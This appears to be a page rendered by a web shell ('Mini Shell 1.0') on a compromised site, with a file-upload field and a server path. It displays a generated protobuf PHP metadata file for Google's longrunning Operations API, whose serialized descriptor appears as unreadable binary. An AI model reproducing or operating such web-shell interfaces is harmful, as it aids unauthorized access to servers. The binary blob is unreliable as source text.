HOME


Mini Shell 1.0
Redirecting to https://devs.lapieza.net/iniciar-sesion Redirecting to https://devs.lapieza.net/iniciar-sesion.
DIR: /var/www/devs.lapieza.net/vendor/google/longrunning/metadata/Longrunning/
Upload File :
Current File : /var/www/devs.lapieza.net/vendor/google/longrunning/metadata/Longrunning/Operations.php
<?php
# Generated by the protocol buffer compiler.  DO NOT EDIT!
# source: google/longrunning/operations.proto

namespace GPBMetadata\Google\Longrunning;

class Operations
{
    public static $is_initialized = false;

    public static function initOnce() {
        $pool = \Google\Protobuf\Internal\DescriptorPool::getGeneratedPool();

        if (static::$is_initialized == true) {
          return;
        }
        \GPBMetadata\Google\Api\Annotations::initOnce();
        \GPBMetadata\Google\Api\Client::initOnce();
        \GPBMetadata\Google\Protobuf\Any::initOnce();
        \GPBMetadata\Google\Protobuf\Duration::initOnce();
        \GPBMetadata\Google\Protobuf\GPBEmpty::initOnce();
        \GPBMetadata\Google\Rpc\Status::initOnce();
        $pool->internalAddGeneratedFile(
            '
�
#google/longrunning/operations.protogoogle.longrunninggoogle/api/client.protogoogle/protobuf/any.proto google/protobuf/descriptor.protogoogle/protobuf/duration.protogoogle/protobuf/empty.protogoogle/rpc/status.proto"�
	Operation
name (	&
metadata (2.google.protobuf.Any
done (#
error (2.google.rpc.StatusH(
response (2.google.protobuf.AnyHB
result"#
GetOperationRequest
name (	"\\
ListOperationsRequest
name (	
filter (	
	page_size (

page_token (	"d
ListOperationsResponse1

operations (2.google.longrunning.Operation
next_page_token (	"&
CancelOperationRequest
name (	"&
DeleteOperationRequest
name (	"P
WaitOperationRequest
name (	*
timeout (2.google.protobuf.Duration"=

OperationInfo

response_type (	

metadata_type (	2�

Operations�
ListOperations).google.longrunning.ListOperationsRequest*.google.longrunning.ListOperationsResponse"+�Aname,filter���/v1/{name=operations}
GetOperation\'.google.longrunning.GetOperationRequest.google.longrunning.Operation"\'�Aname���/v1/{name=operations/**}~
DeleteOperation*.google.longrunning.DeleteOperationRequest.google.protobuf.Empty"\'�Aname���*/v1/{name=operations/**}�
CancelOperation*.google.longrunning.CancelOperationRequest.google.protobuf.Empty"1�Aname���$"/v1/{name=operations/**}:cancel:*Z

WaitOperation(.google.longrunning.WaitOperationRequest.google.longrunning.Operation"�Alongrunning.googleapis.comB�
com.google.longrunningBOperationsProtoPZCcloud.google.com/go/longrunning/autogen/longrunningpb;longrunningpb��GLRUN�Google.LongRunning�Google\\LongRunningbproto3'
        , true);

        static::$is_initialized = true;
    }
}